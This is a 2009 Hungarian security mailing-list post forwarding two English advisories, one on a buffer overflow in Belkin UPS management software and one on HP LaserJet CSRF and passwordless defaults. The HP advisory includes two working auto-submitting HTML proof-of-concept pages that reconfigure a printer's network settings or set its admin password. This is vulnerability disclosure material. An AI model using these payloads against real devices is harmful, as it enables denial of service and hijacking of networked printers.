[guru] Infrastruktúra eszkozok biztonsagi frissitesei
DATE: Tue, 31 Mar 2009 12:44:40 +0200
A Belkin BullDog Plus UPS menedzsment szoftvere buffer overflow hibát
tartalmaz a HTTP basic azonosítási kódjában. A web szerver alapértelmezett
esetben engedélyezett.
Több HP hálózati nyomtató gyári beállításai is hibásak, a konfiguráció
a webes felületen távolról módosítható, de jelszót nem adtak meg.
Ezen kívül a webes admin felület még CSRF hibát is tartalmaz.
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Who:
Belkin International, Inc.
http://www.belkin.com
What:
Belkin BullDog Plus UPS Management Software
v4.0.2 Build 1219
UPS-Service.exe
v1.0.0.1
dated 12/19/2006
How:
The UPS management software contains a built-in web server which
allows for remote management of the UPS. The management interface
is protected by a username and password. Authentication is
performed via Basic authentication.
There is a small stack-based overflow in the base64 decoding
routine which handled the Basic authentication data.
Caveats:
The web server is not enabled by default.
Exploit:
The size of the buffer is too small for shellcode, however, this
can be stored in the GET request, which sits at esp+0x58.
Fix:
I was unable to locate any security contact information for this
vendor, so I attempted to contact their support department, which
turned out to be waste of time.
Workaround:
As previously stated, the web server is not enabled by default.
If you do need to use it, use a firewall or OS port filtering
capabilities to restrict access.
Elazar
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0
wpwEAQECAAYFAkmzNkYACgkQi04xwClgpZiDbAP/TY+XD+L+LOXZ7XbFf5QL+t0UILhh
1dMv3Q565keOjTXbREbaS602KjZk5D1t2chPxvDCecjgCu5oghrTkmzYcG1cS+o8H9HP
CHw58Ckl0u8qwFX04knxD721YQGihoASrKIVQXPexV9xwW1LAfn/6qW3r8dKTopayjL3
039YSEM=
=BoqQ
-----END PGP SIGNATURE-----
--
Free information - Learn about Hardwood Floors. Click now!
http://tagline.hushmail.com/fc/BLSrjkqfXT1M3QReMMSa5Cm5PutBynYJHMxNZHYSJcrlcpIUIlqZaYxtQha/
--- End Message ---
--- Begin Message ---
Louhi Networks Oy
-= Security Advisory =-
Advisory: HP LaserJet multiple models web management CSRF
vulnerability & insecure default configuration
Release Date: 2009-03-17
Last Modified: 2009-03-17
Authors: Henri Lindberg, CISA
[henri d0t lindberg at louhi d0t fi]
Application: HP Embedded Web Server
Devices: HP LaserJet M1522n MFP,
HP Color LaserJet 2605dtn
possibly other HP products
Attack type : CSRF
Risk: Low
Vendor Status: Issue documented in a customer notice
References: http://www.louhinetworks.fi/advisory/HP_20090317.txt
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566
Overview:
Quote from http://www.hp.com:
"Increase effectiveness and productivity with an easy-to-use
high-performance HP MFP. HP spherical toner and an intelligent
cartridge optimise print quality and reliability. Do more with
fast, high-quality print, copy, scan and fax functionality.
This affordable HP MFP delivers print, copy, scan and fax
functionality. Hi-Speed USB 2.0 connectivity and fast,
secure networking enable you to easily share this device.
Handle complex files with a 450 MHz processor and memory up to
64 MB."
Details:
Default configuration for the device does not require user to
define password for configuration changes.
Insecure out-of-the-box configuration combined with CSRF
vulnerability in web management interface allows attacker to
perform unwanted configuration changes through user's browser.
Successful exploitation requires:
1) Out-of-the-box configuration (no management password)
2) Internal user with access to web management interface
3) Knowledge of target printer's DNS name or IP address
4) Ability to lure internal user to a malicious website or
ability to inject malicious HTML/javascript to website
frequented by said internal user.
Simplest management interfaces contains few interesting
features, most significant impact can be achieved with invalid
network configuration. This results in denial-of-service
condition, requiring manual reconfiguration in order to
restore network connectivity.
More advanced management interfaces based on the some software
may contain additional features suitable for exploitation.
It is recommended to check the features of management interface
in order to determine the actual risk for the used product.
Mitigation:
1) Set administrator password
2) Do not browse untrusted sites while logged on to the
management interface
Advisory timeline:
2009-02-17 Contacted vendor through e-mail.
2009-02-17 Vendor response.
2009-03-12 Vendor decides not to patch but to release
a customer notice
2009-03-17 Coordinated release of information
Vendor's customer notice:
HP Security Notice HPSN-2009-001 rev.1
HP LaserJet Printers, HP Edgeline Printers,
and HP Digital Senders - Unverified Input
Proof of Concept:
<html>
<head><title>Network</title></head>
<body onload="document.CSRF.submit();">
<FORM name="CSRF" method="post"
ACTION="http://1.2.3.4/hp/device/config_result_YesNo.html/config";;
style="display:none">
<input name="Clear" value="Yes">
<input name="Menu" value="NetIPChange">
<input name="Configuration"
value="IPConfig=Man&IPAddr=1.1.1.1&SN=2.2.2.2&GW=3.3.3.3&WINS=0.0.0.0">
</form>
</body>
</html>
Invalid value for "Configuration" parameter sets IP, mask and gw to
255.255.255.255
<html>
<head><title>Set password</title></head>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" method="post"
ACTION="http://1.2.3.4/hp/device/set_config_password.html/config";;
style="display:none">
<INPUT type="password" name="Password" MAXLENGTH="16" VALUE="evil">
<INPUT type="password" name="ConfirmPassword" MAXLENGTH="16" VALUE="evil">
<INPUT type="hidden" VALUE="System">
</FORM>
</body>
<html>
--- End Message ---